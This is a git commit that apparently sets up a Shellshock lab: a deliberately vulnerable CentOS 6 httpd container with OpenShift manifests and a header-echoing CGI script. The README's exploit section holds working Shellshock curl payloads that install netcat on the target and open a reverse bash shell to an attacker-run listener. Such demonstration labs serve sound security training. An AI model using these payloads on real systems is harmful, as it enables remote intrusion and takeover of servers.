initial commit

5 years ago · 0a2893663f
9 changed files with 222 additions and 0 deletions
--- a/shellshock/Dockerfile
+++ b/shellshock/Dockerfile
@ -0,0 +1,5 @@
 FROM vulnerable-centos:6
 COPY rootfs .
 RUN yum install -y httpd
 EXPOSE 80 443
 ENTRYPOINT ["/entrypoint.sh"]
--- a/shellshock/README.md
+++ b/shellshock/README.md
@ -0,0 +1,83 @@
 # Shellshock vulnerable image
 ## Build
 Old CentOS images are here: https://vault.centos.org/
 Install it in a virtual machine.
 ```sh
 sudo virt-install --name centos6 --os-variant centos6.5 --memory 2048 --vcpus 2 --disk size=10,alias.name=centos6 --hvm --network network=default --cdrom /var/lib/libvirt/images/CentOS-6.5-x86_64-minimal.iso
 ```
 Mount the qcow2 image as explained [here](https://gist.github.com/shamil/62935d9b456a6f9877b5).
 ```sh
 sudo qemu-nbd --connect=/dev/nbd0 /var/lib/libvirt/images/disk.qcow2
 sudo mount /dev/mapper/VolGroup-lv_root /mnt/
 sudo tar -cvf /tmp/centos6.tar . -C /mnt
 sudo umount /mnt
 sudo qemu-nbd --disconnect /dev/nbd0
 ```
 Create the container image.
 ```sh
 sudo podman import /tmp/centos6.tar vulnerable-centos:6
 sudo buildah bud -t vulnerable-httpd:centos-6 .
 ```
 Push the image to the registry of your choice.
 ```sh
 sudo podman tag localhost/vulnerable-httpd:centos-6 registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6
 sudo podman push registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6
 ```
 ## Usage
 ```sh
 sudo podman run -d --rm --name vulnerable-httpd vulnerable-httpd:centos-6
 POD_IP=$(sudo podman inspect --format "{{.NetworkSettings.IPAddress}}" vulnerable-httpd)
 ```
 ```
 sh-4.1# curl http://$POD_IP/cgi-bin/hello.cgi -H "X-Name: Nicolas"
 Hello, Nicolas!
 sh-4.1# curl http://$POD_IP/cgi-bin/hello.cgi
 Hello, World!
 ```
 ## Deployment
 ```sh
 oc apply -f openshift/
 ```
 ## Exploit
 Find the URL of the vulnerable CGI-BIN.
 ```sh
 export TARGET="https://$(oc get route frontend -n vulnerable-httpd -o jsonpath="{.spec.host}")/cgi-bin/hello.cgi"
 ```
 Start a C&C server.
 ```sh
 sudo firewall-cmd --add-port 6666/tcp
 nc -l -p 6666
 ```
 Set the IP address of the C&C server.
 ```sh
 export SERVER_IP=192.168.6.2
 ```
 Exploit the target.
 ```sh
 curl "$TARGET" -H "X-Name: () { :; }; /usr/bin/yum install -y nc"
 curl "$TARGET" -H "X-Name: () { :; }; /bin/bash -i >& /dev/tcp/$SERVER_IP/6666 0>&1"
 ```
--- a/shellshock/openshift/00-namespace.yaml
+++ b/shellshock/openshift/00-namespace.yaml
@ -0,0 +1,10 @@
 apiVersion: v1
 kind: Namespace
 metadata:
  annotations:
    openshift.io/description: ""
    openshift.io/display-name: ""
  name: vulnerable-httpd
 spec:
  finalizers:
  - kubernetes
--- a/shellshock/openshift/10-deploy.yaml
+++ b/shellshock/openshift/10-deploy.yaml
@ -0,0 +1,32 @@
 apiVersion: apps/v1
 kind: Deployment
 metadata:
  labels:
    app: frontend
    app.kubernetes.io/component: frontend
    app.kubernetes.io/instance: frontend
  name: frontend
  namespace: vulnerable-httpd
 spec:
  replicas: 1
  selector:
    matchLabels:
      deployment: frontend
  template:
    metadata:
      creationTimestamp: null
      labels:
        deployment: frontend
    spec:
      containers:
      - image: registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6
        imagePullPolicy: IfNotPresent
        name: frontend
        resources: {}
        terminationMessagePath: /dev/termination-log
        terminationMessagePolicy: File
      dnsPolicy: ClusterFirst
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext: {}
      terminationGracePeriodSeconds: 30
--- a/shellshock/openshift/20-svc.yaml
+++ b/shellshock/openshift/20-svc.yaml
@ -0,0 +1,17 @@
 apiVersion: v1
 kind: Service
 metadata:
  labels:
    app: frontend
  name: frontend
  namespace: vulnerable-httpd
 spec:
  ports:
  - name: http
    port: 80
    protocol: TCP
    targetPort: 80
  selector:
    deployment: frontend
  sessionAffinity: None
  type: ClusterIP
--- a/shellshock/openshift/30-route.yaml
+++ b/shellshock/openshift/30-route.yaml
@ -0,0 +1,17 @@
 apiVersion: route.openshift.io/v1
 kind: Route
 metadata:
  labels:
    app: frontend
  name: frontend
  namespace: vulnerable-httpd
 spec:
  port:
    targetPort: http
  tls:
    termination: edge
  to:
    kind: Service
    name: frontend
    weight: 100
  wildcardPolicy: None
--- a/shellshock/rootfs/entrypoint.sh
+++ b/shellshock/rootfs/entrypoint.sh
@ -0,0 +1,18 @@
 #!/bin/sh
 # Stop the scrip on any error encountered
 set -Eeuo pipefail
 # Start a test instance of apache
 /usr/sbin/apachectl -k start
 sleep 2
 # Run a test query
 curl -s http://localhost/cgi-bin/hello.cgi -H "X-Name: OpenShift"
 # Stop apache
 /usr/sbin/apachectl -k stop
 sleep 2
 # Run the real apache
 exec /usr/sbin/httpd -X
--- a/shellshock/rootfs/etc/yum.repos.d/CentOS-Base.repo
+++ b/shellshock/rootfs/etc/yum.repos.d/CentOS-Base.repo
@ -0,0 +1,35 @@
 [base]
 name=CentOS-$releasever - Base
 baseurl=https://vault.centos.org/6.5/os/$basearch/
 gpgcheck=1
 gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
 #released updates
 [updates]
 name=CentOS-$releasever - Updates
 baseurl=http://vault.centos.org/6.5/updates/$basearch/
 gpgcheck=1
 gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
 #additional packages that may be useful
 [extras]
 name=CentOS-$releasever - Extras
 baseurl=http://vault.centos.org/6.5/extras/$basearch/
 gpgcheck=1
 gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
 #additional packages that extend functionality of existing packages
 [centosplus]
 name=CentOS-$releasever - Plus
 baseurl=http://vault.centos.org/6.5/centosplus/$basearch/
 gpgcheck=1
 enabled=0
 gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
 #contrib - packages by Centos Users
 [contrib]
 name=CentOS-$releasever - Contrib
 baseurl=http://vault.centos.org/6.5/contrib/$basearch/
 gpgcheck=1
 enabled=0
 gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
--- a/shellshock/rootfs/var/www/cgi-bin/hello.cgi
+++ b/shellshock/rootfs/var/www/cgi-bin/hello.cgi
@ -0,0 +1,5 @@
 #!/bin/sh
 echo "Content-Type: text/plain"
 echo
 echo "Hello, ${HTTP_X_NAME:-World}!"